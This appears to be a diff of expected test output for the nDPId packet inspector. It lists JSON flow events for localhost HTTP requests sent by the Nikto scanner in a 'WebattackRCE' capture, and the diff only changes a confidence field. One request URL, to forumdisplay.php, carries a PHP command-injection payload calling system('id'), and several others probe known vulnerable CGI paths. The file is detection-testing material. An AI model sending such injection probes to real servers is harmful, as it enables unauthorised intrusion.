00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":514,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":514,"flow_packet_id":1,"flow_last_seen":1576420277500,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1576420277500,"pkt":"AAAAAAAAAAAAAAAACABFAADKj49AAEAGrJx\/AAABfwAAAcWeH5BxerdT3YbEDoAYAED+vgAAAQEICp1m\/iSdZv4kR0VUIC90aWtpL3Rpa2ktaW5zdGFsbC5waHAgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMDAyMikNCg0K"} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":514,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":514,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277500,"flow_last_seen":1576420277500,"flow_idle_time":7580000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420277500,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50590,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/tiki\/tiki-install.php","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000022)"}} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":514,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":514,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277500,"flow_last_seen":1576420277500,"flow_idle_time":7580000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420277500,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50590,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/tiki\/tiki-install.php","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000022)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":515,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":515,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277501,"flow_last_seen":1576420277501,"flow_idle_time":7580000,"flow_min_l4_payload_len":156,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":156,"midstream":1,"thread_ts_msec":1576420277501,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50592,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00686{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":515,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":515,"flow_packet_id":1,"flow_last_seen":1576420277501,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":222,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":222,"pkt_l4_len":188,"thread_ts_msec":1576420277501,"pkt":"AAAAAAAAAAAAAAAACABFAADQ2RZAAEAGYw9\/AAABfwAAAcWgH5BlMeHM00k6b4AYAED+xAAAAQEICp1m\/iWdZv4lR0VUIC9zY3JpcHRzL3NhbXBsZXMvZGV0YWlscy5pZGMgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDAwMjMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01067{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":515,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":515,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277501,"flow_last_seen":1576420277501,"flow_idle_time":7580000,"flow_min_l4_payload_len":156,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":156,"midstream":1,"thread_ts_msec":1576420277501,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50592,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/scripts\/samples\/details.idc","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000023)"}} +01067{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":515,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":515,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277501,"flow_last_seen":1576420277501,"flow_idle_time":7580000,"flow_min_l4_payload_len":156,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":156,"midstream":1,"thread_ts_msec":1576420277501,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50592,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/scripts\/samples\/details.idc","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000023)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":516,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":516,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277503,"flow_last_seen":1576420277503,"flow_idle_time":7580000,"flow_min_l4_payload_len":191,"flow_max_l4_payload_len":191,"flow_tot_l4_payload_len":191,"flow_avg_l4_payload_len":191,"midstream":1,"thread_ts_msec":1576420277503,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50594,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00734{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":516,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":516,"flow_packet_id":1,"flow_last_seen":1576420277503,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":257,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":257,"pkt_l4_len":223,"thread_ts_msec":1576420277503,"pkt":"AAAAAAAAAAAAAAAACABFAADzlctAAEAGpjd\/AAABfwAAAcWiH5BEoK0q6pkm3YAYAED+5wAAAQEICp1m\/iedZv4nR0VUIC9mb3J1bWRpc3BsYXkucGhwP0dMT0JBTFNcW1xdPTEmZj0yJmNvbW1hPVwiLnN5c3RlbVwoJ2lkJ1wpXC5cIiBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMDA3MCkNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01109{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":516,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":516,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277503,"flow_last_seen":1576420277503,"flow_idle_time":7580000,"flow_min_l4_payload_len":191,"flow_max_l4_payload_len":191,"flow_tot_l4_payload_len":191,"flow_avg_l4_payload_len":191,"midstream":1,"thread_ts_msec":1576420277503,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50594,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forumdisplay.php?GLOBALS\\[\\]=1&f=2&comma=\\\".system\\('id'\\)\\.\\\"","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000070)"}} +01109{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":516,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":516,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277503,"flow_last_seen":1576420277503,"flow_idle_time":7580000,"flow_min_l4_payload_len":191,"flow_max_l4_payload_len":191,"flow_tot_l4_payload_len":191,"flow_avg_l4_payload_len":191,"midstream":1,"thread_ts_msec":1576420277503,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50594,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forumdisplay.php?GLOBALS\\[\\]=1&f=2&comma=\\\".system\\('id'\\)\\.\\\"","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000070)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":517,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":517,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277505,"flow_last_seen":1576420277505,"flow_idle_time":7580000,"flow_min_l4_payload_len":153,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":153,"flow_avg_l4_payload_len":153,"midstream":1,"thread_ts_msec":1576420277505,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50596,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00683{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":517,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":517,"flow_packet_id":1,"flow_last_seen":1576420277505,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":219,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":219,"pkt_l4_len":185,"thread_ts_msec":1576420277505,"pkt":"AAAAAAAAAAAAAAAACABFAADNh+tAAEAGtD1\/AAABfwAAAcWkH5AZpL8K5\/crh4AYAED+wQAAAQEICp1m\/imdZv4oR0VUIC9ndWVzdGJvb2svZ3Vlc3Rib29rLmh0bWwgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDAwNzEpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01063{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":517,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":517,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277505,"flow_last_seen":1576420277505,"flow_idle_time":7580000,"flow_min_l4_payload_len":153,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":153,"flow_avg_l4_payload_len":153,"midstream":1,"thread_ts_msec":1576420277505,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50596,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/guestbook\/guestbook.html","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000071)"}} +01063{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":517,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":517,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277505,"flow_last_seen":1576420277505,"flow_idle_time":7580000,"flow_min_l4_payload_len":153,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":153,"flow_avg_l4_payload_len":153,"midstream":1,"thread_ts_msec":1576420277505,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50596,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/guestbook\/guestbook.html","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000071)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":518,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":518,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277506,"flow_last_seen":1576420277506,"flow_idle_time":7580000,"flow_min_l4_payload_len":158,"flow_max_l4_payload_len":158,"flow_tot_l4_payload_len":158,"flow_avg_l4_payload_len":158,"midstream":1,"thread_ts_msec":1576420277506,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50598,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00690{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":518,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":518,"flow_packet_id":1,"flow_last_seen":1576420277506,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":224,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":224,"pkt_l4_len":190,"thread_ts_msec":1576420277506,"pkt":"AAAAAAAAAAAAAAAACABFAADSOPFAAEAGAzN\/AAABfwAAAcWmH5AZrAAQDbKHy4AYAED+xgAAAQEICp1m\/iqdZv4qR0VUIC9odG1sL2NnaS1iaW4vY2dpY3NvP3F1ZXJ5PUFBQSBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAwMDcyKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":518,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":518,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277506,"flow_last_seen":1576420277506,"flow_idle_time":7580000,"flow_min_l4_payload_len":158,"flow_max_l4_payload_len":158,"flow_tot_l4_payload_len":158,"flow_avg_l4_payload_len":158,"midstream":1,"thread_ts_msec":1576420277506,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50598,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/html\/cgi-bin\/cgicso?query=AAA","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000072)"}} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":518,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":518,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277506,"flow_last_seen":1576420277506,"flow_idle_time":7580000,"flow_min_l4_payload_len":158,"flow_max_l4_payload_len":158,"flow_tot_l4_payload_len":158,"flow_avg_l4_payload_len":158,"midstream":1,"thread_ts_msec":1576420277506,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50598,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/html\/cgi-bin\/cgicso?query=AAA","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000072)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":519,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":519,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277509,"flow_last_seen":1576420277509,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420277509,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50600,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":519,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":519,"flow_packet_id":1,"flow_last_seen":1576420277509,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420277509,"pkt":"AAAAAAAAAAAAAAAACABFAADGjRRAAEAGrxt\/AAABfwAAAcWoH5A27bX0CottMYAYAED+ugAAAQEICp1m\/i2dZv4sR0VUIC9iYi1kbmJkL2ZheHN1cnZleSBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMDE0MikNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":519,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":519,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277509,"flow_last_seen":1576420277509,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420277509,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50600,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/bb-dnbd\/faxsurvey","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000142)"}} +01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":519,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":519,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277509,"flow_last_seen":1576420277509,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420277509,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50600,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/bb-dnbd\/faxsurvey","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000142)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":520,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":520,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277510,"flow_last_seen":1576420277510,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277510,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50602,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":520,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":520,"flow_packet_id":1,"flow_last_seen":1576420277510,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277510,"pkt":"AAAAAAAAAAAAAAAACABFAADBP59AAEAG\/JV\/AAABfwAAAcWqH5D7oQd9r6h8pYAYAED+tQAAAQEICp1m\/i6dZv4uR0VUIC9jYXJ0Y2FydC5jZ2kgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDAxNDMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":520,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":520,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277510,"flow_last_seen":1576420277510,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277510,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50602,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cartcart.cgi","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000143)"}} +01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":520,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":520,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277510,"flow_last_seen":1576420277510,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277510,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50602,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cartcart.cgi","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000143)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":521,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":521,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277512,"flow_last_seen":1576420277512,"flow_idle_time":7580000,"flow_min_l4_payload_len":156,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":156,"midstream":1,"thread_ts_msec":1576420277512,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50604,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00686{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":521,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":521,"flow_packet_id":1,"flow_last_seen":1576420277512,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":222,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":222,"pkt_l4_len":188,"thread_ts_msec":1576420277512,"pkt":"AAAAAAAAAAAAAAAACABFAADQQ2ZAAEAG+L9\/AAABfwAAAcWsH5AIFXuH0ihJCIAYAED+xAAAAQEICp1m\/i+dZv4vR0VUIC9zY3JpcHRzL0NhcmVsbG8vQ2FyZWxsby5kbGwgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDAxNDQpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01067{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":521,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":521,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277512,"flow_last_seen":1576420277512,"flow_idle_time":7580000,"flow_min_l4_payload_len":156,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":156,"midstream":1,"thread_ts_msec":1576420277512,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50604,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/scripts\/Carello\/Carello.dll","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000144)"}} 